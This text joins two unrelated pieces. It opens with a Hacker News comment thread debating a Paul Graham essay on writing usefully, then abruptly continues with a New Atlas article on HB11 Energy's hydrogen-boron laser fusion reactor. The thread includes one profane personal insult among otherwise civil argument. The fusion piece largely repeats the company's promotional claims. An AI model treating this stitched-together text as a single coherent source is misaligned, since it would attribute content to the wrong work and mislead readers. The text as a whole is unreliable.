It's one thing to argue exactly how much politeness is necessary and whether a specific article meets the standard or not, but it seems ridiculous to write off the entire concept of politeness. If someone wrote an article arguing a point and included tons of expletives at anyone who believed otherwise -- even if they're fully right and it's about an important safety issue -- then the article probably isn't going to be good at convincing anyone who came in already believing otherwise. The article will just be cheerleading and a pat on the back for people that believed the article's point to begin with. (Sometimes that's useful to energize people who already believed the article's point, but in that case people should be clear that's the point of the article, and not delude themselves into thinking the article is something they can send to people to win them over.)

metalliqaz(4286) 4 days ago [-]

Drop us a link my man.

Psyladine(10000) 4 days ago [-]

Policing tone is passive aggressive censorship & bias. It's as hideous a concept as 'culture appropriation' or the cult of positivity.

https://gawker.com/on-smarm-1476594977

rossdavidh(4220) 3 days ago [-]

Oddly, coming from an author who has written so many essays which I find incredibly useful and interesting, this essay I found not especially useful, and not especially interesting.

techiferous(3914) 3 days ago [-]

I found it both useful and interesting. To each their own, I guess.

lidHanteyk(10000) 4 days ago [-]

You made a fresh account to advertise a billionaire's printed collection of bullshit. I encourage you to re-read your comment a few more times until you understand how your words come across to others.

pzqmpzqm(10000) 4 days ago [-]

I don't care how it comes across. Fuck you, asshole.

danenania(3870) 4 days ago [-]

This reminds me of the saying 'don't speak unless you can improve upon the silence' (apparently attributed to many sources, but most commonly Jorge Luis Borges). The world would certainly be less noisy if we all followed that one.

I've always found this idea helpful when anxious or unsure of myself in social situations. A lot of the nervousness comes from the pressure to 'say the right thing' and make a good impression, but that very pressure tends to ensure that I won't say anything of value (often quite to the contrary!), so I'm better off keeping my mouth shut, or speaking very little, until I relax and start thinking of truly 'useful' things to say naturally. And if it doesn't happen, that's ok--I'm fine with being the quiet guy.

It can be applied in many other areas as well. It's amazing how much you can usually improve a visual design, a piece of writing, or probably any other creative work just by repeatedly going through and removing or revising anything that you have even the slightest doubt about.

gist(2274) 4 days ago [-]

> 'don't speak unless you can improve upon the silence'

Sounds like one of those things that is meant to keep people in their place and/or make them feel less worthy or as a put down.

> A lot of the nervousness comes from the pressure to 'say the right thing'

I can tell from your bio you are much younger than I am so I will offer this advice to you as 'an older guy' (note I did not say 'dude' either). Not only will you care less about that when you get older but you will find that people very generally will be drawn to you more if you don't appear to be concerned about what comes out of your mouth (within reason of course and depending on the precise circumstances meaning sure there are cases where you don't want to just say or do anything).

Traster(10000) 4 days ago [-]

>How can you ensure that the things you say are true and novel and important? Believe it or not, there is a trick for doing this. I learned it from my friend Robert Morris, who has a horror of saying anything dumb. His trick is not to say anything unless he's sure it's worth hearing. This makes it hard to get opinions out of him, but when you do, they're usually right.

How is this useful? How do I say things that are true,novel,important. Oh well, only say things that you're sure they're 'worth hearing' - where presumably, worth hearing is defined as being true, novel and important.

This seems like quite a solipsistic view of essay writing. If everyone knew how useful their writing was before anyone else read it then the problem he's describing wouldn't exist. No one would choose to publish bad things - the problem is people publish bad things because they don't know they're bad until other people have pointed out why.

All this is really doing is arguing for a bias against publishing - have a high threshold, as a result lots of good ideas will go unpublished, but the few that do get published will make you look good. Is that actually a good solution to provide the most value to the people reading, or is that a good solution to maintain your reputation?

amiga_500(10000) 4 days ago [-]

I assume Mr Morris would have kept that gem to himself.

strongbond(10000) 4 days ago [-]

I know several people who keep silent until they can say something clever, and frankly, in most group situations they stand out as being slightly weird. Keeping your intellectual powder dry is just not a socially 'giving' behaviour. What's wrong with saying something that's not clever? Within a group, it might send the conversation off in a delightfully unanticipated direction. There's more to it all than always being right. Or clever.

martin-adams(4119) 4 days ago [-]

I've interpreted this as to hold back on publishing your thoughts until you actually are confident in what your thoughts are.

I have a habit of forming my ideas in emails before I know the conclusion. It's important to edit that work and remove the dead ends and keep it concise. It's important to keep it useful.

I guess what he's saying is if you still don't know the conclusion of your writing, maybe you shouldn't publish it.

This of course is writing for the benefit of the reader. There is plenty of writing which is beneficial to the writer.

timerol(10000) 4 days ago [-]

PG never justifies this, and just claims that 'with essay writing, publication bias is the way to go.' There are a huge number of essayists that I have the option to read. I would prefer to read each of their best thoughts, rather than read more of their thoughts.

In my life, Twitter is for hot takes, and Feedly is for deep thoughts.

Edmond(3640) 4 days ago [-]

You can start by not using the word: 'Usefully' :)

heyyyouu(3722) 4 days ago [-]

Not only is it a horrible word it's not even accurate in this context -- it's modifying 'To Write' which is the infinitive verb, which really is the action of the writing, not the result, which is what the author actually wants to convey.

Normally this wouldn't bug me so much but on an essay about effective writing....urgh.

friendlybus(10000) 4 days ago [-]

This reads like a list of bullet points the author dreamed up that morning. I can feel the morning coffee and feigned interest in communicating to the anonymous internet as the self-interested writer taps a pen on his computer screen.

A better way for this writer to succeed would have been to wrap his list of 'rules' around a problem for a character, institution or team of people. Placing these imagined rules in story through a daily work schedule at the 9-5 software office job would greatly improved it's readability.

Bob works at Innitech and he needs to create an essay on the latest doodad the boss is craving to provide to his superiors. Bob's needs to provide precision only when it is necessary because of [humorous anecdote about engineering culture]. Jane works at InGen and needs to provide an essay on a C++ based linux app that rotates raptor eggs or whatever. This rule X covers the strength she needs to convey in her essay and this is how her client presentation will be improved by it. The rule on clarity of writing is how she can help her co-workers with accurate, clear information.

The author would engage a broad set of interests and the reader can quickly digest the information that matters to them because everybody understands the story format. The author could put down his morning coffee and instead describe part of the story to his wife or secretary and see the reaction of someone outside the field responding to what could be an interesting topic.

We are left with mechanical writing that has to be laboriously deconstructed and reconstructed in the reader's mind as context that applies somewhere in their life. Nobody is quite sure when, where, why or how they are going to be writing an essay, but my golly they are prepared with a bullet point list of rules to do so.

alexandercrohde(4184) 4 days ago [-]

Is this comment satire?

>> I can feel the morning coffee and feigned interest

PG admits he rereads some of his sentences up to 100 times in his revision process in the very piece you criticize.

>>The author could put down his morning coffee and instead describe part of the story to his wife or secretary and see the reaction of someone outside the field responding to what could be an interesting topic.

His writing also addresses this in the same writing, advising people to specialize with a target audience... Did you read this piece?

This is either funny trolling (giving condescending essay advice to one of the most succesful essayists of our era, on the platform he created), or woefully lazy.

throwanem(3470) 4 days ago [-]

Conversely, anyone who already does write essays almost certainly already knows what purpose they serve and how to pursue it. Or, if they don't, that's almost certainly because they are new to the form and haven't yet grasped it firmly.

(On the question of whether Graham, in particular, despite being not at all new to the form, has likewise not grasped it firmly, 'further affiant sayeth naught'...)

edit: Naught save that perhaps having a guarantee of an audience, as HN's commentariat furnishes Graham, may not be ideal as a means of fostering development in the skill of writing. If you're going to be read and discussed regardless of merit, how do you know merit when you achieve it? How do you avoid mistaking the contingent for the essential? How do you refine your craft in the absence of meaningful feedback?

xvector(2999) 4 days ago [-]

My English teachers rewarded flowery, verbose writing. Over time I found this unwieldy and now I find myself re-reading my sentences to see what I can delete.

It's satisfying, like deleting unused code in a messy codebase. I envy writers who manage to densely pack information in sentences that are beautiful to read.

WhompingWindows(4315) 3 days ago [-]

They're English teachers, they view language through the lens of literature. If you read Faulkner, you'll find extremely long and verbose sentences. If you read Hemingway or McCarthy, you'll find much more economic and sparing use of words.

The problem is outside of literature, readers want knowledge, not pretty language. I think many teachers lead their students astray, as the vast majority of us write for knowledge and not for prettiness.

grvdrm(10000) 4 days ago [-]

Professionally this was described to me as: 1. you write like a salesperson 2. you write like a scientist

It's hard to please everyone. The vast majority of writing tilts in one direction or another. Very few writers (in any setting) strike the right balance. Very few readers take off their own lenses to attempt to understand the writer's angle.

One tool I like using: Grammarly. It's not fool-proof by any means. But it helps point out verbosity and write more clearly by helping me learn when my writing isn't as clear as it can be.

tpaschalis(4120) 4 days ago [-]

It's satisfying because it's also surprisingly hard!

Like Mark Twain once said 'I didn't have time to write you a short letter, so I wrote you a long one.'

rmason(64) 4 days ago [-]

I experienced the same thing with English teachers. But I had a friend point out that Hemingway (whom we both adored) wrote sentences that were 7 words shorter than normal. Writing short punchy sentences without a single spare word.

Steinbeck wrote that way and so did Elmore Leonard. Leonard said he'd get down a first draft and then go back a second time taking words out that weren't necessary.

https://www.litcharts.com/blog/analitics/what-makes-hemingwa...

TimPC(10000) 4 days ago [-]

I experienced this too. I'm trying my best to unlearn it because I'm writing a novel. I'm not so adept with flowery prose as to write literary fiction, so I want to have more practical sentences that have better pacing.

tonyedgecombe(4013) 4 days ago [-]

I tend to be too terse.

combatentropy(4295) 4 days ago [-]

> My English teachers rewarded flowery, verbose writing.

Same here, and I suspect the same for most people: 'due to a series of historical accidents the teaching of writing has gotten mixed together with the study of literature' --- http://www.paulgraham.com/essay.html Toward the end of high school I found The Elements of Style by accident and it changed my life. Yes, it changed my life!

I was always more interested in art than science. So I didn't become a programmer until I was almost 30. What struck me was how similar it was to prose.

1. There are many ways to write a program

2. Your first draft of a program is usually bad, but you can steadily improve it by rewriting it over and over and over. This unglamourous technique is the secret behind good prose too, as Graham points out.

3. As you rewrite it, you find you can do the same thing in half the space.

4. The programs that are most pleasant to use are ones where the programmer first wrote it for himself. Likewise, as Graham said here, a good strategy for useful essays is to write it first for yourself.

ahsans(10000) 4 days ago [-]

I've always found PG's essays to be incredibly intriguing.

I'm working in a startup, and everything he says is just very insightful about running one. I hope that PG shares more about growing a company that's running on an experimental business model.

This is one of his other masterpieces. There is a certain art of communicating and he's sharing that with the world for everyone to learn. Not many people share their experiences and miscellaneous things in detail.

I for one am thankful that PG still writes and I hope that he continues.

friendlybus(10000) 4 days ago [-]

Masterpeice?

hnhg(10000) 4 days ago [-]

I'll say it again, it's a piece of writing that wouldn't warrant any attention if it weren't for the author's status here.

I'm halfway through and my brain is stunned by the effort of forcing it down.

PG needs a break from writing for a while. I enjoyed his early stuff and I hope he gets a return to form.

[edit: it's like he's the George Lucas of writing useful articles for hackers: the early ones were classics but he somehow lost the magic for his follow-up series]

vasilipupkin(4269) 4 days ago [-]

Strong disagree there. Sure, quality varies. I thought 'The Two Kinds of Moderate', which is very recent, was excellent.

meekstro(10000) 4 days ago [-]

Would you be kind enough to share any links to your own writing and some of the key factors that improved it.

I wish to improve my communication and appreciate that Paul Graham thought hard then freely shared his insights on such a difficult topic for a great deal of people.

I've always wondered how and why Geoff Bezos ran Amazon with six page essays and now I think I'm a bit closer to understanding.

mesaframe(4119) 4 days ago [-]

Glad I'm not the only one. First few paragraphs lead to a good buildup but going on it fell apart.

Further, It's hard to criticise Graham on HN.

blowski(3348) 4 days ago [-]

I think you're right. He's just churning out banal advice on a broad range of topics in which he has limited expertise, in the form of long-winded blog posts. It's so different from his early stuff, it's almost like he's hired a ghost writer to merely give the appearance he's still writing.

alexandercrohde(4184) 4 days ago [-]

>> I'll say it again, it's a piece of writing that wouldn't warrant any attention if it weren't for the author's status here.

This is probably true. If I was the person to write this, and post this on my personal blog, and submitted it to HN, nobody would give a fuck.

Of course, that may not indicate anything, because that could be said for Newton's Principia, Einstein's Relativity, The Great Gatsby, Proof of Fermat's last theorom...

I think the question isn't 'Would the world appreciate this if it weren't by PG?' but 'SHOULD the world appreciate this, even if it weren't PG?'

jstummbillig(10000) 4 days ago [-]

This is incredibly lazy criticism. You add no analysis, reasoning or anything of value.

hooande(3824) 4 days ago [-]

The topic of useful writing is important. The ideas in this essay may not be surprising or unexpected, but the author does lay out a clear formula (importance + novelty + correctness + strength) that probably isn't obvious to most. It seems to be correct and the concrete list of usefulness criteria is strong. Everything seems to check out.

The focus on correctness in this style of essay writing seems like a function of an engineer's thought process. If I write an essay about a vacation at the beach there isn't much of a requirement to be correct about the details. The goal could be to share my perspective or observations, which is more about being honest than being right.

I like the formula above, I think it clarifies this style of writing well. I plan to pay attention to it in the future.

Traster(10000) 4 days ago [-]

The formula is wrong though. To provide a counter-example - Cunningham's Law

>the best way to get the right answer on the internet is not to ask a question; it's to post the wrong answer.

Sometimes saying something wrong, may actually be more useful. Either because you're clarifying a problem or making a connection or drawing a contrast or showing someone else the path by letting them see your chain of logic.

timavr(10000) 4 days ago [-]

Controversial point, but PGs writing is F-.

It seems a lot of effort goes into sounding smart, rather then delivering information required.

Who learned anything from above?

HereBeBeasties(10000) 4 days ago [-]

I found the whole thing to read like a set of bullet points. Fragmented, rather repetitive in terms of ideas and with no flow. Hard to slog through, to be honest.

The author seems to have expended great effort on terseness, writing in very short sentences which artificially forced him to start more of them with coordinate conjunctions than feels comfortable to me. It did not make for an easy read and all felt rather too self-conscious. Good writing should focus me on the ideas, not the annoying syntactic structure of the writing.

I didn't get on with it.

AlwaysBCoding(4319) 4 days ago [-]

The model of precision and correctness being opposing forces that increase in strength the more you hone in on one is useful for me and something that I had never put into words before.

WA(3735) 4 days ago [-]

Tldr to be honest. I kinda clashed right with the premisse: 'How to write useful' and 'What should an essay be?' are basically conflicting things in some way.

Didn't pg also have an essay on what an essay is and came to the conclusion that an essay is meant to explore a topic for oneself? But could also be that I read this somewhere else.

So, an essay is for the writer to explore stuff and have interested readers go along.

But useful writing is for the reader only. If pg had cut this essay to less than 500 words (and I bet this could've been done without losing information), it'd been a lot more useful, although probably not an 'essay' anymore.

lliamander(4319) 4 days ago [-]

Something I tend to see in online arguments, here and elsewhere, is the tendency to throw everything at the other person and see what sticks. I've been guilty of it myself.

The result is a wall of text that few will read and will contain many points that are easy to knock down, poorly worded, or irrelevant.

Now, I try to stick to one point, if possible, that I feel I can articulate well and defend.

vinliao(10000) 3 days ago [-]

This remind me of a quote: 'if you're saying ten things, you're not saying anything.'

mochialex(10000) 4 days ago [-]

Ditto for correctness, importance, and strength. In effect the four components are like numbers you can multiply together to get a score for usefulness.

What is the fourth component?

iainmerrick(4317) 4 days ago [-]

Novelty.

pzqmpzqm(10000) 4 days ago [-]

The first time I read Zero to One by Peter Thiel, I was a bit miffed. Stupid shit stated poorly. The second time, inartful puffery stated overly plainly. The third time, individual brilliance stated clearly.

Many replies here would do well to read, re-read, and re-re-read with an introspective mindset. This is perhaps the best quality material I have seen from pg for quite some time. Its clarity is brilliant and the thing I liked most was the second, and to me unexpected section, full of the reasons haters gonna hate.

I speak only for myself, and this is a throwaway, so nothing personal is at stake. This is a very lucid and precise examination of the fine controls at stake in writing. Their natural tension, the details of qualification. In my opinion, which may be trash, who knows, this will be cited for years to come because it is, in fact, true.

keiferski(1025) 4 days ago [-]

The ideas in Zero to One are not new and can be summarized in a few paragraphs. As with basically every other book/essay/speech written by a financially-successful person, it is over-valued simply because its author is good at making money.

That said, it is certainly better than your typical business book - but that isn't saying much.

timavr(10000) 4 days ago [-]

It is brilliant because it is brilliant and if you read 3 times and can't see the brilliance, then....

Just stating that something is good doesn't make it good, even though people might believe it.

We have a book, which was written quite a long time ago, filled with just utter nonsense. According to PG it is useful writing. It hits on all his points. It is much easier to be persuasive/useful when only you have the light, but when sun is out, you just one of em.

rimliu(10000) 4 days ago [-]

Sometimes a cigar is just a cigar.

caligarn(10000) 4 days ago [-]

Is Paul unfamiliar with what makes good academic writing? He starts by digging into academic writing, but I am not sure he knows how it functions and what it functions to do. Good and great academic writing pushes the envelope on theories and frameworks and tends to be the repository for new ideas that people like Paul use to make sense of the world. A case in point is Clayton Christensen. It's in the forges of his profession and writing practice that his Innovator's Dilemma was born. Academic writing may not be accessible and easy to read for outsiders, and tends towards a high degree of density. But that's the task of journalists, business people, educators, and essayists etc. to translate and apply it to the real world.

rdlecler1(4137) 4 days ago [-]

Former academic here. I disagree. Academic writing has evolved to demonstrate that you are (1) an insider and (2) to obfuscate your ideas so that peer reviewers are less likely to challenge you.

TimPC(10000) 4 days ago [-]

I think this varies a lot by subject. Certain fields reward ambiguity and vagueness quite heavily. Good academic writing tends to be the exception rather than the rule. This may be true of essays as well as good writing is quite rare. I think the criticism is less about accessibility and more about the general trend towards uselessness of academic writing in a lot of fields of academia.

peterwwillis(2666) 4 days ago [-]

Publication bias has the nasty effect of changing what you think. You start writing something because you had something you wanted to say, and then you start proofreading and editing and moving things around, and eventually you realize you're cutting entire paragraphs because your entire position has changed. You're not saying what you intended to say, and you're not sure if it's because what you were going to say was wrong, or you just edited yourself into a completely different essay.

I sometimes visualize this by writing one rough draft as fast as I can and save it as 'v1'. Then I create a 'v2' and begin my edits, and I can create more versions as I go if I want. When I feel like I'm finally done (hours/days later) I compare it to v1, and try to figure out how the hell the entire thing became so different.

On the 'novelty+strength pisses people off' part: you don't have to piss people off to write a good essay. One example of a convincing essay argument is to make it depend on the beliefs of the people you're trying to convince, such that Y can only exist if X is right, and they already believe X is right. They won't immediately run to your new idea with open arms, but they'll have a much more open mind about it. Anyway, there's an entire universe of rhetoric you can employ to break down the barriers to new ideas. https://en.wikipedia.org/wiki/Rhetoric

jmiskovic(10000) 4 days ago [-]

I've also noticed that effect. When you are motivated to sit down and write something, you have a strong point you want to put to words and elaborate. The more effort you put in, the more thinking you do and more related threads to go down, qualifications to elaborate and so on.

You say this is a 'nasty effect', but I'm not convinced it is a negative thing. You started off with a black & white idea and ended up with better grasp of matter. Maybe the edited text isn't edgy and pointed, but it is more mature. Do you consider your v1s better than your v2s?

philwelch(3940) 4 days ago [-]

> You start writing something because you had something you wanted to say, and then you start proofreading and editing and moving things around, and eventually you realize you're cutting entire paragraphs because your entire position has changed. You're not saying what you intended to say, and you're not sure if it's because what you were going to say was wrong, or you just edited yourself into a completely different essay.

That's kind of the point. Writing isn't just a way to communicate ideas to other people, it's also a structured way to work through those ideas yourself.

alexandercrohde(4184) 4 days ago [-]

tl; dr:

1. Sets the topic of 'What is a good essay?'

2. Asserts that correctness is necessary, but not sufficient condition for a good essay.

3. Illustrates 2 by pointing out that by increasing vagueness, complete correctness is always possible. Characterizes correctness/precision as opposing forces.

4. Adds two more criteria for a good essay - telling people something important, and that they don't know

5. Adds the essential caveat that things we know subconsciously may be worth restating [crucially, as points 1-5 we all certainly subconsciously knew]

6. Adds a fourth dimension to a good essay: 'as unequivocal as possible' [aka strength]

7. Highlights the inherent tradeoffs in satisfying these conditions. Increasing one dimension may reduce audience size.

8. Details an simple algorithm for only writing important/true things -- reviewing/revising one's own ideas heavily before publishing (up to 100 times)

9. Proposes a technique to find important topics: by examining the pool topics one cares about

10. Proposes a technique to find novel topics: By examining topics that you've thought about a lot [and surprised yourself with when you found a connection]

11. Suggests 'strength' [6] comes from thinking well and skillful use of qualifiers.

12. Adds another quality to what makes a good essay -- simplicity

-

13. Proposes that good essays (by this formula) are particularly likely to make people mad

14. Identifies one cause of anger is that some widely-held incorrect beliefs an essay calls out are likely to be cherished beliefs

15. Mentions the strength component of very precise writing (as well as brevity) can come across as incredibly confident, and exacerbate the ruffling of feathers

16. Proposes that being misrepresented is particularly likely with this essay style, and isn't avoidable generally, but doesn't think one should worry too much about disingenuous misinterpretation.

-

17. Advises aspiring essayists to relax the constraint of breadth-of-audience/topics. Suggests publication isn't a necessity.

18. Provides some hopeful thoughts on the future of essays

jfarmer(3323) 4 days ago [-]

we all spinoza now

alexandercrohde(4184) 4 days ago [-]

Observations.

This is one of my longest tl; drs, particularly for a short essay. This to me signals high content ratio (low compressibility).

As somebody who tried for years to get people online to pay attention to my essays, I am not super confident that we have good content-discovery mechanisms for essays online [except video essays, which seem to thrive]. Thus I don't take this essay as personally relevant, as I am not personally convinced that a good essay written by an unfamous person, would warrant enough attention to justify the rigorous revision process.

I notice PG chooses to view the essay through an artistic/historic lens that puts him in the minority. It seems to me he strives very hard to stay above the primal desires that dominate the internet-attention-economy. A very tough challenge.

dugditches(4313) 4 days ago [-]

While the Internet provides a platform for Essays, as he says, I think maybe a bigger point is it allowing the rise of 'Video Essays'.

Where now content creators are turning out 30+ minute videos on a single subject. While in the past it used to be more 'dry' things like History and the like it seems more mainstream subjects are being covered. Movies, cars, current social issues, etc.

And just how much you actually get from them. They're often spoken from positions of authority on a subject. And slick editing and video may reinforce their credibility to the viewer. But often they just feel like empty stitched together wikipedia clippings with nice effects and humor sprinkled in to keep the viewer interested.

Compared to crafting words and language like this Author tried to convey, you just rely on balance between entertainment & information.

TimPC(10000) 4 days ago [-]

A very small portion of video's are video essays even if content creators are turning out 30m on a single topic. The organization and structure of the argument is completely different. Usually the goal of videos are primarily entertainment and occasionally a secondary goal of being informative. Usually the goal of an essay is primarily being informative with an occasional secondary goal of being entertaining.

Jaruzel(982) 4 days ago [-]

Like TV before it, it's the dumbing down the internet.

osdiab(3976) 4 days ago [-]

While the internet is full of garbage writing, I don't feel like telling people that they shouldn't say anything wrong or potentially unimportant is the right way to go. That's a perfectionist attitude that stifles people's ability to explore, experiment, be wrong, learn, improve, and act. Like learning a language, if you never speak it because you're afraid to say something wrong, you'll never learn.

And separately, being enlightened with novel pithy facts isn't the only reason people write things. There's a lot that can't be transmitted in that form, and while I appreciate that style of writing for startup advice or a how-to guide, it's definitely not universally applicable.

injb(10000) 4 days ago [-]

' if you never speak it because you're afraid to say something wrong, you'll never learn'

If you're afraid to say your idea because you know (or suspect) that it's wrong, then you have already learned the hardest part of the lesson. Of course, it still remains to find out what the right idea is, but voicing one that you know to be wrong is hardly going to help with that.

throwawaylolx(10000) 4 days ago [-]

I think an otherwise interesting point is obscured by your construing of a strawman argument:

>I don't feel like telling people that they shouldn't say anything wrong or potentially unimportant is the right way to go. That's a perfectionist attitude that stifles people's ability to explore, experiment, be wrong, learn, improve, and act.

It is dubious to imply that the author is trying to police what people can say and consequently how they can act: he's explicitly talking about _essays_, a literary form typically used for advancing arguments. By reframing his argument as an attempt at 'telling people that they shouldn't say anything wrong,' you're arguing against a much less interesting argument and sidestepping the central theme of _essays_ altogether.

In other words, I think the claim that good essays must not necessarilly show novelty, correctness, strength, and importance is a much more interesting argument, and, against correctness at least, one can probably find intellectual companionship among early 20th century futurists, dadaists, and later on fascists.

lliamander(4319) 4 days ago [-]

Writing is hard. for many people, writing anything at all is a struggle. That struggle also can go away with practice. Eventually you get to the point where expressing yourself with the written word becomes very natural.

Of the criteria that Paul suggested (true, important, novel, clear) I would say that novice writers should strive to write with just one of those qualities (which can vary from one piece of writing to another).

As you achieve fluency and words just flow from the pen (or keyboard) and the focus shifts away from being able to express yourself, you add the other criteria to improve the quality of the ideas you express.

6gvONxR4sf7o(10000) 4 days ago [-]

>... I don't feel like telling people that they shouldn't say anything wrong or potentially unimportant is the right way to go.

I think you're putting words in his mouth. You seem to be reading it as 'only write useful things' rather than 'how to write usefully.' You laid out a number of reasons that writing doesn't need to be useful to others, which is great, but doesn't contradict the essay how you seem to think it does.

hinkley(4219) 4 days ago [-]

It's the sort of advice you get from either a worrier or someone who has already perfected their craft.

And in an era where people talk a lot about how others achieve something and then 'close the door behind them', well, this is closing the door behind you, Paul.

jimbokun(4130) 4 days ago [-]

'I don't feel like telling people that they shouldn't say anything wrong or potentially unimportant is the right way to go.'

The problem is far too many people err in the opposite direction. I don't see an Internet only consisting of perfectly reasoned and argued content, with everyone else fearfully staying quiet. I see countless comments suggesting the writer didn't take a second to consider contrary viewpoints, or facts that might undermine their argument, or stating things with certainty without regard to whether or not they have a factual basis.

keiferski(1025) 4 days ago [-]

As a counterpoint, I'd argue that the 'mathematical' approach to good writing is inherently flawed. That is, trying to arrive at the formula for the 'best' essay via dialectic (argument) is to miss the forest for the trees. Writing is an art, not a science. Formal logic was developed to display arguments, so if you are trying to be as precise and mathematical as possible, use that instead.

Instead, I'd suggest reading the great writers of the past and present (but focus more on the past). Study what works, what speaks to you, what stylistic approach you favor, and so on. As a bonus, you'll learn more about what has been said by other intelligent people and subsequently avoid writing over-confident, ill-informed essays...

If you're looking for stellar examples of essay-writing, I personally recommend Jorge Luis Borges and David Foster Wallace. Both manage to write in a manner both erudite and coherent, without seeming too florid or too simplistic. Here are a few samples:

- A New Refutation of Time, Borges: https://www.gwern.net/docs/borges/1947-borges-anewrefutation...

- The Analytical Language of John Wilkins, Borges: http://www.alamut.com/subj/artiface/language/johnWilkins.htm...

- David Lynch and Lost Highway, Wallace: http://www.lynchnet.com/lh/lhpremiere.html

- Laughing with Kafka, Wallace: https://harpers.org/wp-content/uploads/HarpersMagazine-1998-...

- Consider the Lobster, Wallace: http://www.columbia.edu/~col8/lobsterarticle.pdf

Edit: added some more essay links.

randcraw(4314) 4 days ago [-]

> Writing is an art, not a science.

Writing fiction may be an art, but writing nonfiction is a craft. And essays are nonfiction.

The creator of art seeks somehow to offer fresh insight, often employing some form of novelty, be it technique, medium, context, perspective, etc.

Craft, however, isn't about novelty; it's about engineering a clear convincing message effectively, efficiently, and ideally... memorably and with elan.

I admit the line between art and craft is often blurry (probably because the craftsman has taken too much artistic license). Unlike art, the techniques employed in an essay should never impede its purpose. There, it's only the message that matters, not the medium.

CaptArmchair(10000) 4 days ago [-]

I think the fallacy is in the premise: 'An essay should be useful.'

Well, useful is always in the eye of the beholder. There is no such thing as an absolute truth, after all. And pretending there is, and it's even attainable, is intellectually dishonest.

Sure, an essay could be a formal piece that approaches an almost 'mathematical' approach. After all, an essay a first and foremost an argument presented by the author. Even a flawed argument is still an argument. And a flawed essay is still an essay.

The fallacy here is being implicitly reductionist. If your premise states 'an essay should be useful' then you're basically reducing the definition of what an essay is to a formal argument based on logic and falsifiable facts, and rejecting any other text as 'not an essay' or, worse, 'not useful' - whatever that might mean - or, worse, 'nonsenses' or 'a dumb thing to say'.

A quick glance on Wikipedia dispenses such reductionism rather swiftly:

https://en.wikipedia.org/wiki/Essay

Not-withstanding, I think PG's essay does contain some excellent personal advice on writing style and technique itself. No more, no less. His sin is confounding form and function. The former always follows the latter, never the inverse.

philwelch(3940) 4 days ago [-]

I like David Foster Wallace as a writer and he's as much an authority as anyone when it comes to writing well, but I think there's a pretty major difference in terms of goals and priorities. PG is writing about writing as a means of processing ideas. He's taking the perspective of a structural engineer, not an architect. While Wallace wrote beautifully, PG is writing about writing usefully, even if that writing is bare and unornamented. And while that may not be your preferred style, I wouldn't dismiss it as something that someone would want to do.

artsr(10000) 4 days ago [-]

> Writing is an art, not a science.

I agree with this, but avoiding writing nonsense is science, and not art. So there definitely is a scientific aspect to writing.

vasilipupkin(4269) 4 days ago [-]

there is a difference between a literary essay and the kind PG is talking about here. PG's essays are more like maybe business commentary than literary essays. Some of these insights apply anyway, to all essays - but don't confuse different types of essays.

the_af(10000) 4 days ago [-]

First of all: interesting post!

But since you mentioned Borges let me offer a counter-counterpoint: Borges was obsessive about his writings and can be considered 'mathematical' about them. He chopped away anything that didn't fit and was very careful about the construction of sentences. He was so obsessed that he recalled -- or so I read somewhere -- something that was already printed in order to make corrections to it.

Poe claimed he was quite 'mathematical' (or maybe the word is 'methodical', or 'analytical') about the construction of his famous poem The Raven. While this claim is disputed, or maybe he exaggerated, at least it's something he liked to claim about some of his work.





Historical Discussions: Radical hydrogen-boron reactor leapfrogs current nuclear fusion tech? (February 21, 2020: 753 points)

(757) Radical hydrogen-boron reactor leapfrogs current nuclear fusion tech?

757 points 4 days ago by chris_overseas in 2313th position

newatlas.com | Estimated reading time – 6 minutes | comments | anchor

'We are sidestepping all of the scientific challenges that have held fusion energy back for more than half a century,' says the director of an Australian company that claims its hydrogen-boron fusion technology is already working a billion times better than expected.

HB11 Energy is a spin-out company that originated at the University of New South Wales, and it announced today a swag of patents through Japan, China and the USA protecting its unique approach to fusion energy generation.

Fusion, of course, is the long-awaited clean, safe theoretical solution to humanity's energy needs. It's how the Sun itself makes the vast amounts of energy that have powered life on our planet up until now. Where nuclear fission – the splitting of atoms to release energy – has proven incredibly powerful but insanely destructive when things go wrong, fusion promises reliable, safe, low cost, green energy generation with no chance of radioactive meltdown.

It's just always been 20 years away from being 20 years away. A number of multi-billion dollar projects are pushing slowly forward, from the Max Planck Institute's insanely complex Wendelstein 7-X stellerator to the 35-nation ITER Tokamak project, and most rely on a deuterium-tritium thermonuclear fusion approach that requires the creation of ludicrously hot temperatures, much hotter than the surface of the Sun, at up to 15 million degrees Celsius (27 million degrees Fahrenheit). This is where HB11's tech takes a sharp left turn.

The results of decades of research by Emeritus Professor Heinrich Hora, HB11's approach to fusion does away with rare, radioactive and difficult fuels like tritium altogether – as well as those incredibly high temperatures. Instead, it uses plentiful hydrogen and boron B-11, employing the precise application of some very special lasers to start the fusion reaction.

Here's how HB11 describes its 'deceptively simple' approach: the design is 'a largely empty metal sphere, where a modestly sized HB11 fuel pellet is held in the center, with apertures on different sides for the two lasers. One laser establishes the magnetic containment field for the plasma and the second laser triggers the 'avalanche' fusion chain reaction. The alpha particles generated by the reaction would create an electrical flow that can be channeled almost directly into an existing power grid with no need for a heat exchanger or steam turbine generator.'

HB11's Managing Director Dr. Warren McKenzie clarifies over the phone: 'A lot of fusion experiments are using the lasers to heat things up to crazy temperatures – we're not. We're using the laser to massively accelerate the hydrogen through the boron sample using non-linear forced. You could say we're using the hydrogen as a dart, and hoping to hit a boron , and if we hit one, we can start a fusion reaction. That's the essence of it. If you've got a scientific appreciation of temperature, it's essentially the speed of atoms moving around. Creating fusion using temperature is essentially randomly moving atoms around, and hoping they'll hit one another, our approach is much more precise.'

'The hydrogen/boron fusion creates a couple of helium atoms,' he continues. 'They're naked heliums, they don't have electrons, so they have a positive charge. We just have to collect that charge. Essentially, the lack of electrons is a product of the reaction and it directly creates the current.'

A small pellet of hydrogen/boron fuel is placed in a large sphere and hit with two lasers simultaneously to create a fusion reaction that directly generates electricity with no steam turbines required

HB11

The lasers themselves rely upon cutting-edge 'Chirped Pulse Amplification' technology, the development of which won its inventors the 2018 Nobel prize in Physics. Much smaller and simpler than any of the high-temperature fusion generators, HB11 says its generators would be compact, clean and safe enough to build in urban environments. There's no nuclear waste involved, no superheated steam, and no chance of a meltdown.

'This is brand new,' Professor Hora tells us. '10-petawatt power laser pulses. It's been shown that you can create fusion conditions without hundreds of millions of degrees. This is completely new knowledge. I've been working on how to accomplish this for more than 40 years. It's a unique result. Now we have to convince the fusion people – it works better than the present day hundred million degree thermal equilibrium generators. We have something new at hand to make a drastic change in the whole situation. A substitute for carbon as our energy source. A radical new situation and a new hope for energy and the climate.'

